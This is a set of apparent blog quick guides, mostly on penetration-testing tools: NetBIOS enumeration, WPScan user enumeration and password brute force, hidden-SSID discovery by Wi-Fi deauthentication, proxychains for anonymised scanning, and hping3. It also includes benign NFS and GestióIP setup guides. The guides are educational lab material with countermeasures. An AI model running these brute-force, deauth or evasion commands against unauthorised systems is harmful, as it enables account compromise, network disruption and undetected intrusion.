Mount NFS

How To Mount NFS Share On Ubuntu

Network File System (NFS)

NFS allows a system to share directories and files with others over the network. By using NFS, users and programs can access files on remote systems almost as if they were local files.”

Lab Overview

In this quick guide we will illustrate how to install the needed nfs client component and mount a NFS share on a Ubuntu client. In this guide I am mounting a NFS share that i have setup on my NAS.

Lab Requirements

  1. NFS server
  2. Shared directory on the NFS server
  3. Ubuntu client

Step 1: Prepare the Ubuntu client

Lets start by updating the Ubuntu client.

sudo apt update -y

Step 2: Configure the Firewall to allow NFS traffic

Enable the firewall to allow NFS traffic, the default port for NFS is 2049. Make sure to substitute the IP address to you NFS server IP address. My NFS server have IP address 192.168.200.222.

sudo ufw allow from [NFS_Server_IP or NFS_subnet_address] to any port nfs

Example:

sudo ufw allow from 192.168.200.222 to any port nfs

Verify the firewall change

sudo ufw status

org@per:~$ sudo ufw status
Status: active

To                         Action      From
--                         ------      ----
22/tcp                     ALLOW       Anywhere
80/tcp                     ALLOW       Anywhere
443/tcp                    ALLOW       Anywhere
2049                       ALLOW       192.168.200.222
22/tcp (v6)                ALLOW       Anywhere (v6)
80/tcp (v6)                ALLOW       Anywhere (v6)
443/tcp (v6)               ALLOW       Anywhere (v6)

org@per:~$

Step 3: Install NFS common client

nfs-common provides NFS functionality without including the server component, It will allow us to mount a NFS share.

Run the command bellow to install nfs-common.

sudo apt install nfs-common -y

Step 4: Configure the client and mount the NFS share

Lets make sure that we can reach the NFS share before we configure the client. Enter the command bellow the list the NFS shares on the NFS server. Change the IP address to match your NFS server.

sudo showmount --exports 192.168.200.222

org@per:~$ sudo showmount --exports 192.168.200.222
Export list for 192.168.200.222:
/i-data/19ddc0ea/nfs       *
/i-data/19ddc0ea/nfs/cloud 192.168.100.16,192.168.100.99
/i-data/19ddc0ea/nfs/NAS   192.168.100.99,192.168.100.100,192.168.100.110
org@per:~$

Create a mount point for the NFS shared folder

Next we need to create a mount point for the shared directory. The new directory is where we will mount and access our NFS share.

I am creating a new directory called cloud under /nfs

sudo mkdir -p /Your_directory/Your_sharedfolder

Example:

sudo mkdir -p /nfs/cloud

Mount the NFS share to the new directory

Mount the shared directory on your NFS server to the new directory on the client.

sudo mount NFS_ServerIP:/Folder_on_NFS_server /Your_directory/Your_sharedfolder

Example:

sudo mount 192.168.200.222:/cloud /nfs/cloud

Confirm that the mount is successful with the command bellow.

sudo df -h

org@per:/$ sudo df -h
Filesystem              Size  Used Avail Use% Mounted on
udev                    953M     0  953M   0% /dev
tmpfs                   199M  1.1M  198M   1% /run
/dev/sda2                98G  4.9G   89G   6% /
tmpfs                   994M     0  994M   0% /dev/shm
tmpfs                   5.0M     0  5.0M   0% /run/lock
tmpfs                   994M     0  994M   0% /sys/fs/cgroup
/dev/loop0               90M   90M     0 100% /snap/core/7917
/dev/loop1               55M   55M     0 100% /snap/lxd/12211
/dev/loop2              218M  218M     0 100% /snap/nextcloud/19299
tmpfs                   199M     0  199M   0% /run/user/1000
/dev/loop3               92M   92M     0 100% /snap/core/8689
/dev/loop4               67M   67M     0 100% /snap/lxd/13522
192.168.200.222:/cloud  3.6T   41G  3.6T   2% /nfs/cloud
org@per:/$

Step 5: Mount the remote NFS share at boot

Configure the fstab configuration file to auto mount the NFS share a boot. Edit the fstab configuration file and add the following line at the bottom of the file.

NFS_Server_IP:/cloud      /Folder_on_NFS_server /Your_directory      nfs auto,nofail,noatime,nolock,intr,tcp,actimeo=1800 0 0

Edit the line to match your share.

sudo nano /etc/fstab

Example:

192.168.200.222:/cloud    /nfs/cloud   nfs auto,nofail,noatime,nolock,intr,tcp,actimeo=1800 0 0

Reboot the system and confirm that the share have auto mounted, after reboot type in the command below and confirm that you can see the NFS share.

sudo df -h

Step 6: Write a file to the NFS share

Lets try out the share by creating a test file with some text in it

echo "File from NFS Client" | sudo tee /nfs/cloud/testfile1

Catalog the new test file

cat /nfs/cloud/testfile1

org@per:~$ cat /nfs/cloud/testfile1
File from NFS Client

Step 7: Optional un-mounting an NFS Share

You can unmount a NFS share by moving it out of the share’s directory structure, use the command below to unmount a share.

sudo umount /nfs/cloud

If you also want to prevent the share from being remounted on the next reboot, edit /etc/fstab and either delete the line or comment it out.

Conclusion

In this quick guide we configured the NFS client and mounted the NFS share on a Ubuntu client.

For more Linux quick guides please check out the Linux guide section.




NetBIOS Enumeration Wtih Nmap, NBTSan & Nbstat

NetBIOS Enumeration Wtih nmap & nbstat

NetBIOS Enumeration

With NetBIOS Enumeration we can scan a local area network or a specific target on the intranet and extract NetBIOS information from it like.

  • Devices that belong to a domain
  • Storage shares on the network
  • Domain policies and passwords
  • Printers on the network
  • Group information and users

NetBIOS

Stands for Network Basic Input Output System and allows communication between different applications running on different systems within a LAN.

The service uses a 16 ASCII character string to identify a device on a local network.

The first 15th characters are for identifying devices, the last 16th character is to identify services.

Services and ports.

  • UDP/137 Name service
  • UDP/138 Datagram service
  • TCP/139 Session service

In this quick guide i am using nmap, nbtstat on Windows, and NBTScan on Kali Linux. NBTSan can be run on Windows to if you what to try it there.

You can find several tools on all platforms that you can use for NetBIOS Enumeration, if you wish to test some other tools.

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use it for illegal activity. The author is not responsible for the use of the application or the users action.

Common NetBIOS Name Table (NBT) names

NetBIOS Code Type Information
<00> UNIQUE Hostname
<00> GROUP Domain name
<host name><03> UNIQUE Messenger service
<use rname><03> UNIQUE Logged-in user
<20> UNIQUE File Server Service
<21> UNIQUE RAS Client Service
<22> UNIQUE Microsoft Exchange
<1B> UNIQUE Domain Master Browser
<1C> GROUP Domain Controllers
<1D> GROUP Master Browser
<INet~Services> GROUP IIS

Requirements

  • Kali Linux
  • NBTScan
  • Nmap
  • Windows AD
  • Windows client on the same LAN as the Windows AD

Step 1: NetBIOS Enumeration With nbtstat in Windows

Open a CMD in windows and type in the fallowing syntax.

nbtstat -A 192.168.100.11

Ethernet0:
Node IpAddress: [192.168.100.12] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    ONLINE-IT      <00>  GROUP       Registered
    SRV1           <00>  UNIQUE      Registered
    ONLINE-IT      <1C>  GROUP       Registered
    SRV1           <20>  UNIQUE      Registered
    ONLINE-IT      <1B>  UNIQUE      Registered

    MAC Address = 01:0c:29:3c:83:4e


Npcap Loopback Adapter:
Node IpAddress: [169.254.33.233] Scope Id: []

    Host not found.

C:\>

Step 2: NetBIOS Enumeration With NBTScan

NBTScan is by default installed on Kali Linux, but there is a Windows version as well.

NOTE: You need to open the tool in CMD for it to work in Windows.

We can use the tool to scan a whole network or just one target.

C:\NBTScan>nbtscan.exe  192.168.100.11-254

Doing NBT name scan for addresses from 192.168.100.11-254

IP address       NetBIOS Name     Server    User             MAC address
------------------------------------------------------------------------------
192.168.100.11   SRV1             <server>  <unknown>        01:0c:29:3c:83:4e
192.168.100.12   SRV2             <server>  <unknown>        01-0a-49-67-b8-01

C:\NBTScan>

Adding more arguments to the syntax to extract more information.

C:\NBTScan>nbtscan.exe -v 192.168.100.11

Doing NBT name scan for addresses from 192.168.100.11


NetBIOS Name Table for Host 192.168.100.11:

Incomplete packet, 191 bytes long.
Name             Service          Type
----------------------------------------
ONLINE-IT        <00>              GROUP
SRV1             <00>             UNIQUE
ONLINE-IT        <1c>              GROUP
SRV1             <20>             UNIQUE
ONLINE-IT        <1b>             UNIQUE

Adapter address: 01:0c:29:3c:83:4e
----------------------------------------

C:\NBTScan>

You can find more arguments in NBTScan:s official documentation.

Step 3: NetBIOS Enumeration With Nmap Scripting Engine

To run the nbstat.nse script, open Nmap and run the following syntax.

nmap -sV 192.168.100.11 --script nbstat.nse -v

Host script results:

| nbstat: NetBIOS name: SRV1, NetBIOS user: <unknown>, NetBIOS MAC: 01:0c:29:3c:83:4e (VMware)

| Names:

|   ONLINE-IT<00>        Flags: <group><active>

|   SRV1<00>             Flags: <unique><active>

|   ONLINE-IT<1c>        Flags: <group><active>

|   SRV1<20>             Flags: <unique><active>

|_  ONLINE-IT<1b>        Flags: <unique><active>



NSE: Script Post-scanning.

Initiating NSE at 17:50

Completed NSE at 17:50, 0.00s elapsed

Initiating NSE at 17:50

Completed NSE at 17:50, 0.00s elapsed

Read data files from: C:\Program Files (x86)\Nmap

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 141.97 seconds

           Raw packets sent: 1033 (45.436KB) | Rcvd: 1011 (41.756KB)

Conclusion

As we can see it easy to extract information with NetBIOS Enumeration techniques and tools.

We have used tools on both Windows and Linux and scanned an AD server on the domain.

To countermeasure NetBIOS enumeration you need to disable the service, however some old applications still relays on NetBIOS communication.

Check out the Ethical Hacking notes for more Kali Linux quick guides.




WPScan

WordPress Enumeration with WPScan

WPScan is a vulnerability scanner that comes preinstalled with Kali Linux, but can be installed on most Linux distros.

The tool can be used to scan WordPress installations for vulnerability and security issues.

You can download the Turnkey image from here.

In this tutorial i am using WPScan to enumerate a WordPress website that is running on a Linux lab server, i am using Turnkey Linux with a WordPress preinstalled images for a server, the server is running on VMware Workstation.

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use it for illegal activity. The author is not responsible for the use of the application or the users action.

Requirements

  • Kali Linux
  • WordPress Website

Step 1: WPScan Syntax

1.1 Update WPScan vulnerabilities database.

wpscan --update

1.2 Scan a website for vulnerabilities, you can either use a host name or a IP address.

wpscan --url 172.168.200.140

wpscan --url www.wordpress.local

NOTE: If you run WPScan on a website that is not running WordPress you will be notified in the output that the remote site is up, but not running WordPress.

_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.6.0
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________


Scan Aborted: The remote website is up, but does not seem to be running WordPress.
root@iPhone:~#

1.3 Enumerate plugins

wpscan --url www.wordpress.local --enumerate p

1.4 Scan custom directory

wpscan --url www.wordpress.local --wp-content-dir custom-content

1.5 Enumerate themes

wpscan --url www.wordpress.local --enumerate t

1.6 Stealth Scan

wpscan --url www.wordpress.local --stealthy

1.7 Enumerate users, scan the target site for WordPress authors and usernames.

wpscan --url www.wordpress.local --enumerate u

[i] User(s) Identified:

[+] admin
 | Detected By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] testuser
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)


[+] Finished: Thu Jul 18 15:09:44 2019
[+] Requests Done: 16
[+] Cached Requests: 42
[+] Data Sent: 3.339 KB
[+] Data Received: 26.85 KB
[+] Memory used: 102.207 MB
[+] Elapsed time: 00:00:01
root@iPhone:~#

NOTE: limit how many usernames WPScan will enumerate


Step 2: Brute Force WordPress Account Password

2.1 We can use WPScan to brute force a WordPress account.

To run the attack we need a password wordlist, there is one called “rockyou.txt” in Kali Linux.

You can find it in “/usr/share/wordlists/ “

Type the command into terminal to brute force the password for a user

wpscan –url [wordpress url] –wordlist [path to wordlist] –username [username] –threads [number of threads]

wpscan --url www.wordpress.local –wordlist /usr/share/wordlists/rockyou.txt –username testuser –threads 2

NOTE: Eventually, you should see the password listed in the terminal next to the login ID of the user.

Step 3: Optional

3.1 Use WPScan with Tor and proxychains, for more information on how to setup Tor and proxychains please check out our notes.

NOTE: You need to start the Tor service before running the command.

proxychains wpscan --url www.wordpress.local

Conclusion

As we can see it is very easy for a attacker to scan a WordPress site and brute force a account.

To avoid WordPress enumeration and brute force attacks use WordPress plugins that limits the number of login attempts for a specific username and IP address.

Furthermore administrators should avoid using usernames as nicknames and display names, display names ares shown in WordPress and easy to scan.

WPScan scans the URL’s for usernames, if the administrator username is not used for publishing, then the account wont be scanned by WPScan”

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use it for illegal activity. The author is not responsible for the use of the application or the users action.




Uncover Hidden SSID

How To Uncover Hidden SSID With Kali Linux

In this quick lab we will go trough how to Uncover hidden SSID with Kali Linux and a wireless card that can be set to monitor mode.

SSID is short for service set identifier (SSID), SSID is the sequence of characters that uniquely identify a wireless local area network, the name can be up to 32 alphanumeric character and is case sensitive .

By default the configuration mode for a access point is to broadcast the SSID in a beacon frame, this allows clients to discover them easily.

Some network administrators disables the broadcasting of SSID in the configuration file, this tells the access point to not broadcast the SSID in the beacon frame, it is done in believe that it will add one more security layer to the network, the effect of not sending out the SSID is that only devices that knows the name of the SSID can connect to the network.

Unfortunately hiding the SSID will not add any extra security layer to the WLAN, there are lots of different method to uncover a hidden SSID, you can use windows and android tools to automatically discover SSIDs, hiding the SSID should not be considered as a extra security layer.

Requirements

I am using a old D-link router with disabled SSID, for wireless card i am using is my 8 year old AWUS036H-

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use for illegal activity. The author is not responsible for the use of the application or the users action.

Step 1: Set Wireless card in monitor mode

1.1 Display wireless card name

sudo iwconfig

eth0      no wireless extensions.

lo        no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Here we can see that my wireless card name is called wlan0.

1.2 Kill interfering processes

sudo airmon-ng check kill

1.3 Put the interface into monitor mode, this can be archived in different ways, i am using airmon-ng to start the card in monitor mode.

sudo airmon-ng start wlan0

NOTE: The command will create a new virtual interface with the same name as your old interface plus the word mon.

1.4 Display wireless card to confirm the new interface

sudo iwconfig 

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
eth0      no wireless extensions.

lo        no wireless extensions.

root@iPhone:~# 

Step 2: Scan for available networks

2.1 Use airodump-ng to scan for nearby networks and look for your router. i know that my BSSID is 84:C9:B2:6A:9E:90 and i am using channel 6.

sudo airodump-ng wlan0mon

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -29      144       11    0   6  130  WPA2 CCMP   PSK  <length:  0>                   
 F0:9F:C2:AA:6C:B9  -47       45        0    0   1  195  WPA2 CCMP   PSK  Perham                         
 32:CD:A7:15:AD:49  -49       29        0    0   6  54e  WPA2 CCMP   PSK  DIRECT-SoM2020 Series          
 BC:EE:7B:7E:18:90  -49      124       12    0   9  195  WPA2 CCMP   PSK  nocco1                         
 80:2A:A8:44:C5:B1  -51       76        3    0   1  195  WPA2 CCMP   PSK  PontuS                         
 82:2A:A8:44:C5:B1  -51       63        0    0   1  195  WPA2 CCMP   PSK  <length:  0>                   
 F2:9F:C2:AA:6C:B9  -47       51        0    0   1  195  WPA2 CCMP   PSK  <length:  0>                    
 08:86:3B:DD:2C:95  -54       20        4    0   1  130  WPA2 CCMP   PSK  belkin.24d        

I can see that the first SSID network have no SSID “<length: 0>” and it matches my BSSID and channel.

Now type down the BSSID and the channel of your access point and cancel the current command and rerun it specifying the BSSID and channel of the hidden SSID.

sudo airodump-ng -c 6 --bssid 84:C9:B2:6A:9E:90 wlan0mon

CH  6 ][ Elapsed: 18 s ][ 2019-07-15 20:21 ][ paused output                                        
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -25  87      185       35    0   6  130  WPA2 CCMP   PSK  <length:  0>               
                                                                                                         
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
                                                                                                         
 84:C9:B2:6A:9E:90  84:C9:B2:6A:9E:90   -1    1 - 0      0       21      

We have two options while scanning the network, we can either wait for a new device to connect. The new device will send out a beacon frame, airodump-ng will immediately populate the SSID in the terminal output.

I will now connect a device to the network to demonstrate how it will show up in the output.

CH  6 ][ Elapsed: 6 mins ][ 2019-07-15 20:27 ][ paused output                                         
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -24 100     3247      416    0   6  130  WPA2 CCMP   PSK  HoneyP01                   
                                                                                                         
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
                                                                                                         
 84:C9:B2:6A:9E:90  84:C9:B2:6A:9E:90   -1    1 - 0      0      262                                       
 84:C9:B2:6A:9E:90  00:C0:CA:95:EA:8B   -7    0 - 1      2        6                                       

Observer that the ESSID is now showing the name HoneyP01

Second options is to force disconnect one or all of devices that are associated with the AP. We can use aireplay-ng to disconnect devices by flooding them with de-authentication packets.

2.2 Open a new terminal and send de authentication packets to all connected devices on the router. The command will send out 5 de-authentication packets to the access point.

sudo aireplay-ng -0 5 -a 84:C9:B2:6A:9E:90 --ignore-negative wlan0mon

20:38:49  Waiting for beacon frame (BSSID: 84:C9:B2:6A:9E:90) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:38:49  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:50  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:50  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:51  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:51  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
root@iPhone:~# 

2.3 Go back to terminal one, now you should see the ESSID of the hidden WLAN.

CH  6 ][ Elapsed: 7 mins ][ 2019-07-15 20:39 ][ paused output                                        
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -16  96     4204      608    0   6  130  WPA2 CCMP   PSK  HoneyP01                   
                                                                                                         
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
                                                                                                         
 84:C9:B2:6A:9E:90  84:C9:B2:6A:9E:90   -1    1 - 0      0      322                                       
 84:C9:B2:6A:9E:90  00:C0:CA:95:EA:8B   -7    0 - 1e     0       37                                

We can refine our scan and just target one associated device, modify the command by adding a target station.

sudo aireplay-ng -0 5 -a 84:C9:B2:6A:9E:90 -c 00:C0:CA:95:EA:8B --ignore-negative wlan0mon

Conclusion

Uncovering a hidden SSID is easy, due to when a device connects to an access point. The device and the access point exchanges probe requests and response packets.

We have covered some basic terminal commands to uncover a hidden SSID. All equipment used on the lab is mine. Please don’t preform the commands on unauthorized networks.




Proxychains

How To Use Proxychains Kali Linux

Proxychains

Proxychains is open source software for Linux systems and comes pre installed with Kali Linux, the tool redirect TCP connections through proxies like TOR, SOCKS and HTTP (S) and it allows us to chain proxy servers.

With proxychains we can hide the IP address of the source traffic and evade IDS and firewalls. We can use use proxychains in alto of situations, like when we want to avoid giving up our IP address or when scanning a target or visiting a website.

Furthermore chaining multiple proxies makes it difficult to track down the source IP address of the TCP connection, the application gives us a way to hide ourselves and stay anonymous. However proxy servers are likely to log your traffic and have to obey local law and jurisdiction.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Step:1 Upgrade/Update & Install Tor

1.1 Upgrade and update the OS.

sudo apt-get update
sudo apt-get upgrade

1.2 Install the tor service.

sudo apt-get install tor

1.3 Start Tor service.

sudo service tor start

1.4 Display Tor service status.

sudo service tor status

NOTE: Tor service needs to run for proxychains to work.

Step2: Configure Proxychains

2.1 The proxychains configuration file is located in the “/etc/” directory edit the configuration file.

sudo nano /etc/proxychains.conf

There is three methods we can run proxychains.

  1. strict_chain
  2. dynamic_chain
  3. random_chain

strict_chain: is the default option in proxychains, every connection goes through the proxies in order that is listed in the configuration file. Strict chaining is best used when you want the source traffic appear from a particular locations.

dynamic_chain: works like the strict chain but it does not require all the proxies in the configuration file to work. If a proxy is down then the connection will jump to the next proxy server in the list.

random_chain: randomnesses proxy connections from the list on the configuration file, the chain of proxy will look different to the target.

Uncomment out the “dynamic_chains” line, it will enable dynamic chaining.

dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
#strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain

NOTE: Uncomment “chain_len” if you are using random_chain , the parameter establishes the number of IP addresses in the chain which are utilized in generating your randomized chain of proxies.

2.2 By default proxychains sends traffic through the host at 127.0.0.1 on port 9050. This is the default Tor configuration, if you are planing to use Tor leave the “defaults set to “tor” as it is. If you are not using Tor, you will need to comment out this line.

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050

2.3 Add proxy servers to the proxychains configuration file, there are free proxy servers on the Internet, i am using free proxy in this lab, you can find them here, another good site with free proxies is spys.one.

Before adding custom proxies add Tor socks5 support, and “socks5 127.0.0.1 9050”

# meanwile
# defaults set to "tor"
socks4         127.0.0.1 9050

SOCKS5          103.21.161.105 6667
HTTPS           156.202.174.101 8080
HTTPS           183.76.154.184 8080
HTTP            142.93.130.169 8118
SOCKS5          178.62.59.71 23187
SOCKS5          50.63.26.13 43001

2.4 Prevent DNS leaks, uncomment “Proxy DNS requests – no leak for DNS data”.

# Quiet mode (no output from library)
#quiet_mode

 Proxy DNS requests - no leak for DNS data
proxy_dns

Exit & Save

Step 3: Proxychains Syntax

3.1 Verify that the proxychains is working.

proxychains firefox www.whatsmyip.org

3.2 Use Proxychains with nmap.

proxychains nmap 1.1.1.1

ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-14 22:00 CEST
Nmap scan report for one.one.one.one (1.1.1.1)
Host is up (0.013s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
53/tcp  open  domain
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 57.22 seconds
root@iPhone:~#

Summit

We have covered how to run proxychains and hide the identity of our source traffic and stay anonymous without being detected.

Check out the Ethical Hacking notes for more Kali Linux quick guides.

DISCLAIMER: This software/tutorial is for educational purposes only.

The tutorial should not be used for illegal activity and the author is not responsible for its use or the users action.




Install GestióIP

How To Install GestióIP (IPAM) Ubuntu 18.04.02

In the guide i will Install GestióIP, “GestióIP is an automated web based IPv4/IPv6 address management (IPAM) software”.

GestioIP IPAM – IP Address Management

IP address management (IPAM) tools help us plan, deploy, mange and monitor IP addresses on our infrastructure.

We can automatically discovers IP addresses of servers and other devices that are connect to the network or have a domain name entire on the local DNS servers.

You can even send SNMP requests to gateways and get response back on connect devices.

I am running Ubuntu 18.04.2 as operating system, but you can install the application on all major Linux distributions.

Prerequisite

  • Ubuntu Server 18.04
  • User with sudo privileges.
  • Static IP address
  • Host name

For more information on how to create a sudo user and configure a static IP please see the quick guides Create Sudo User , Set Static IP address and Configure Host-Name. Check out the Linux guides for more quick guides on basic Linux configuration.

Step 1: System Preparation

1.1 Lets start by updating the repository’s and software packages.

sudo apt update -y
sudo apt upgrade -y

1.2 GestióIP requires an Apache Web Server and MySQL/MariaDB database, as well as some SNMP MIBs.

sudo apt-get install make mysql-server mysql-client apache2 apache2-utils libapache2-mod-perl2 snmp snmp-mibs-downloader wget

1.3 Download required MIBs

sudo download-mibs

1.4 Enable SNMP descovery, comment out the line “mibs :” in /etc/snmp/snmp.conf

sudo nano /etc/snmp/snmp.conf 

# As the snmp packages come without MIB files due to license reasons, loading
# of MIBs is disabled by default. If you added the MIBs you can reenable
# loading them by commenting out the following line.
##mibs :

Exit & Save

Step 2: Configure MySQL

2.1 Start MySQL

sudo systemctl start mysql

2.2 Set a MySQL root password

sudo mysql_secure_installation

Set a root password and answer all following questions with “Y”

2.3 Change authentication plugin to “mysql_native_password”. Open the MySQL console.

sudo mysql

2.4 Switch to mysql databse

use mysql; 

2.5 Display current authentication plugin method for the root user

select Host, User, plugin from user where user="root";

mysql> select Host, User, plugin from user where user="root";
+-----------+------+-------------+
| Host      | User | plugin      |
+-----------+------+-------------+
| localhost | root | auth_socket |
+-----------+------+-------------+
1 row in set (0.00 sec)

2.6 Change authentication plugin to “mysql_native_password”

ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';

Enter your password in ‘password’:

2.7 Display current authentication plugin method again

select Host, User, plugin from user where user="root";

mysql> select Host, User, plugin from user where user="root";
+-----------+------+-----------------------+
| Host      | User | plugin                |
+-----------+------+-----------------------+
| localhost | root | mysql_native_password |
+-----------+------+-----------------------+
1 row in set (0.00 sec)

2.8 Flush privileges and exit

FLUSH PRIVILEGES;

Exit

Step 3: Installation

3.1 Download the installation packet from www.gestioip.net and upload it to the server.

3.2 Unpack the gestioip_3.4.tar.gz file

sudo tar vzxf gestioip_3.4.tar.gz

3.3 Change to the gestioip_3.4 directory

cd gestioip_3.4

3.4 Runt the installation script

sudo ./setup_gestioip.sh

“Setup will propose a couple of parameters e.g. (“Where is Apache daemon binary?”). If you do not have special requirements you can confirm all default parameters by typing ENTER.”

Enter Y to everything the script wants to install.

NOTE: The setup will ask for the user which should be created for the HTTP Standard Authentication.

The script does not create the user automatically. You need to open a second shell and create the user for HTTP Standard Authentication manually by executing the command “htpasswd”

Open a new terminal and enter

sudo /usr/bin/htpasswd -c /etc/apache2/users-gestioip gipadmin

Create the new password

3.5 Go back to terminal one and press enter and continue with the installation

+-------------------------------------------------------+
|                                                       |
|    Installation of GestioIP successfully finished!    |
|                                                       |
|   Please, review /etc/apache2/sites-enabled/gestioip.conf
|            to ensure all is good and                  |
|                                                       |
|              RESTART Apache daemon!                   |
|                                                       |
|            Then, point your browser to                |
|                                                       |
|           http://server/gestioip/install
|                                                       |
|          to configure the database server.            |
|         Access with user "gipadmin" and the
|        the password which you created before          |
|                                                       |
+-------------------------------------------------------+

origin@ipam:~/gestioip_3.4

3.6 Restart apache service

sudo systemctl restart apache2

3.7 Open the web­ based database configuration to complete the installation. http://ip-address/gestioip/install

“Access with the rw­user and the password which you created during the setup with the command “htpasswd” (default rw­user: gipadmin):”

Step 4: Complete the installation

4.1 After entering credentials click “next” on the GestióIP’s installation “Welcome” site.

4.2 Enter the database configuration parameters and click “send”.

4.3 The fallowing page will show if the database parameters was successfully created.

Click “next page” to proceed with the configuration.

4.4 On Configure Sites and Categories enter your site name and network category.

You can change all this values later via the web GUI.

Click “next” to proceed.

4.5 If the configuration was successfully created

Click “next page” to proceed.

4.6 The last page shows if the installation has completed successfully.

If the installation was successful you will be asked to finish the installation by executing a command in the terminal window.

Copy the command and run it in the terminal on the server to delete the installation directory “/var/www/html/gestioip/install/”.

sudo rm -r /var/www/html/gestioip/install 

The installation is now complete and you can open the web GUI by opening http://Your-Server-IP-Address/gestioip/

For mor information on how to configure GestioIP i recommend the official documentation which you can find here.

Conclusion

In this quick guide we have Install GestióIPan open source IPAM server on Ubuntu 18.04.02 and done some basic configuration to get the server up and running.




How To Scan a Network With Hping3

Hping3

Hping3 is a command-line oriented TCP/IP packet assembler and analyser and works like Nmap.

The application is able to send customizes TCP/IP packets and display the reply as ICMP echo packets, even more Hping3 supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features like DDOS flooding attacks.

Hping3 can be used to perform:

  • OS fingerprinting
  • ICMP pings
  • Traceroute
  • Port scanning
  • Firewall testing
  • Test IDSes
  • Network testing and auditing
  • MTU discovery
  • Exploit and vulnerabilities discovery
  • DDOS and ICMP flooding

Hping3 comes pre-installed with Kali Linux but and can also be installed on most Linux distros, also you need to run the commands with sudo privileges. Visit the official documentation at to learn more on how you can use Hping3 http://www.hping.org/documentation.php

Useful Options

-h Show this help
-v Show version
-c Packet count
-i –interval
–flood
-V Verbose mode
-D Debugging
-f Fragment packets
-Q Display sequence number

-0 RAW IP mode
-1 ICMP mode
-2 UDP mode
-8 SCAN mode
-9 listen mode

-F Set the FIN flag
-S Set the SYN flag
-P Set the PUSH flag
-A Set the ACK flag
-U Set the URG flag

Commands

Send a ACK packet to a target

hping3 –A 192.168.100.11

HPING 192.168.100.11 (eth0 192.168.100.11): A set, 40 headers + 0 data bytes
len=46 ip=192.168.100.11 ttl=128 id=29627 sport=0 flags=R seq=0 win=32767 rtt=4.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29628 sport=0 flags=R seq=1 win=32767 rtt=2.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29629 sport=0 flags=R seq=2 win=32767 rtt=2.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29632 sport=0 flags=R seq=3 win=32767 rtt=2.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29633 sport=0 flags=R seq=4 win=32767 rtt=0.6 ms
len=46 ip=192.168.100.11 ttl=128 id=29634 sport=0 flags=R seq=5 win=32767 rtt=8.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29635 sport=0 flags=R seq=6 win=32767 rtt=7.1 ms
len=46 ip=192.168.100.11 ttl=128 id=29636 sport=0 flags=R seq=7 win=32767 rtt=7.0 ms
len=46 ip=192.168.100.11 ttl=128 id=29637 sport=0 flags=R seq=8 win=32767 rtt=5.0 ms

